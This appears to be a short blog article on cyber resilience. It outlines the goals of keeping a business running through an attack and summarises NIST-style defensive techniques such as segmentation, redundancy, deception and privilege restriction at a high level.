Cyber resiliency is really about keeping the business operational despite an attack or incident. It is about the organisation having the systems, processes and controls in place to detect an attack, contain it, recover or maintain operations despite the attack and clean up the affected systems.
Some specific objectives of cyber resilience would include the following.
  • Prevention–apply basic cyber protection mechanisms as well as more advanced cyber security controls to reduce the risk. In addition, threat intelligence is applied to keep the protection relevant
  • Cyber response preparation– create and maintain cyber incident scenarios to train staff and maintain a good level of readiness. If an incident happens, there is a plan and people know what to do
  • Minimise service degradation- in the instance of an attack
  • Identify potential damage- and change resources to limit further damage
  • Maintain trust relationships- and review trust of restored systems
  • Effective controls- understand the effectiveness of cyber security controls in relation to the nature of the adversaries
  • Review systems architecture and restructure to reduce risks
The NIST have published some recommendations that could help with achieving cyber resilience and some of these are outlined below.
A word of caution, this is not for the faint hearted as it reads as if from a military manual.
Adaptive Response- maximise the ability to respond in a timely and appropriate manner to adverse conditions thus limiting business impact and maintaining operations.
Analysis and monitoring– maximise the ability to detect attacks by extensive monitoring that can reveal the extent and scope of an attack. We have seen how AI and Machine Learning is playing an increasing role in this area
Coordinated Protection– implemented a range of protection measures that follow the defence in depth principles thus ensuring that attacks will need to overcome multiple mechanisms in order to be successful
Deception– conceal critical equipment or resources from the attacker, this could include techniques such as encryption or multi-layered firewall approach
Diversity– limit the likelihood of successful attacks on common replicated systems forcing attackers to breach different systems necessitating multiple variants of malware
Dynamic Positioning– distribute and dynamically relocate system resources, this could easily be achieved in a resilient cloud environment, this could go a long way to supporting recovery and continuity as well as making it more difficult for attackers to determine the infrastructure topology
Non Persistence– generate and create resources as needed and avoid the likelihood of intrusions through backdoors left on unused resources
Privilege Restriction– restrict access privileges based on attributes of users and systems as well as environmental considerations i.e. do not give admin rights to a user connected via an Internet café or via a country you have no business with
Redundancy–provide multiple instances of critical business systems to aid recovery from failure of primary systems
Segmentation– define and separate elements of your systems based on their criticality and attribute permissions accordingly. This will help to prevent the spread of malware and give further protection to critical systems
Unpredictability– make random and unpredictable changes to increase uncertainty for attackers thus making it more difficult for them to determine their attack sequence
These techniques put together will go a long way to achieve a high degree of cyber resiliency, which will result in the ability to manage the cyber risk and maintain operational services especially in times of persistent attack